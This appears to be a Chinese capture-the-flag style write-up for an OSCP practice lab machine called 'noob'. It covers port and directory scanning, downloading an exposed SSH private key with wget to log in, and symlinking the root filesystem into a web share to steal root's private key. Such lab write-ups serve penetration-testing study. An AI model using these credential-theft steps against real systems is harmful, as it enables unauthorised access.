【OSCP】noob

admin

108823
文章

90
评论

2024年6月30日15:05:30评论4 views字数 2525阅读8分25秒阅读模式

OSCP 靶场

靶场介绍

noob

easy

ssh 私钥利用、ln 软链接利用

信息收集

主机发现

【OSCP】noob

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.106  
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-16 05:28 EST
Nmap scan report for 192.168.1.106
Host is up (0.00073s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
|   256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
|_  256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
65530/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
MAC Address: 08:00:27:C2:5B:98 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.1.106

【OSCP】noob

目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt      -u http://192.168.1.106:65530  -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.106:65530
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.106:65530/index                (Status: 200) [Size: 19]
http://192.168.1.106:65530/http%3A%2F%2Fyoutube.html (Status: 301) [Size: 54] [--> /http:/youtube.html]
...
http://192.168.1.106:65530/http%3A%2F%2Fswik.php (Status: 301) [Size: 50] [--> /http:/swik.php]
http://192.168.1.106:65530/http%3A%2F%2Fswik.html (Status: 301) [Size: 51] [--> /http:/swik.html]
http://192.168.1.106:65530/nt4share             (Status: 301) [Size: 45] [--> /nt4share/]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

【OSCP】noob

权限获取

通过目录扫描找到ssh 私钥

【OSCP】noob

从上面信息知道了用户名和私钥，我们尝试使用私钥进行登录ssh

wget http://192.168.1.106:65530/nt4share/.ssh/id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]

【OSCP】noob

这里没有找到flag

【OSCP】noob

权限提升

查看65530 端口和服务都没权限看到，看下下面的.ssh，尝试使用ln 创建软链接将root 目录映射到web 服务

【OSCP】noob

ln -s / root

【OSCP】noob

拿到root 的私钥

wget http://192.168.1.106:65530/nt4share/root/root/.ssh/id_rsa

【OSCP】noob

End

“点赞、在看与分享都是莫大的支持”

【OSCP】noob

原文始发于微信公众号（贝雷帽SEC）：【OSCP】noob

左青龙
微信扫一扫

右白虎
微信扫一扫

【OSCP】noob

靶场介绍

信息收集

主机发现

端口扫描

目录扫描

权限获取

权限提升

CISP-PTS中的渗透小技巧分享

攻防演练在即：了解一下红队、蓝队、紫队有什么区别？

恶意 RDP - 重新访问初始访问方法

关于利用电子邮件地址的灵活性进行操作系统命令注入的案例研究

渗透实训-记一次艰难的打点过程

优化 XSS Payloads 绕过大写与长度限制【部分】

S2-061 Struts2远程代码执行漏洞复现（POC详解）

反沙箱钓鱼远控样本分析

CNVD—由前端Js引发的SQL注入通用高危

蓝队HW 实战应急响应-案例

发表评论

在线咨询

微信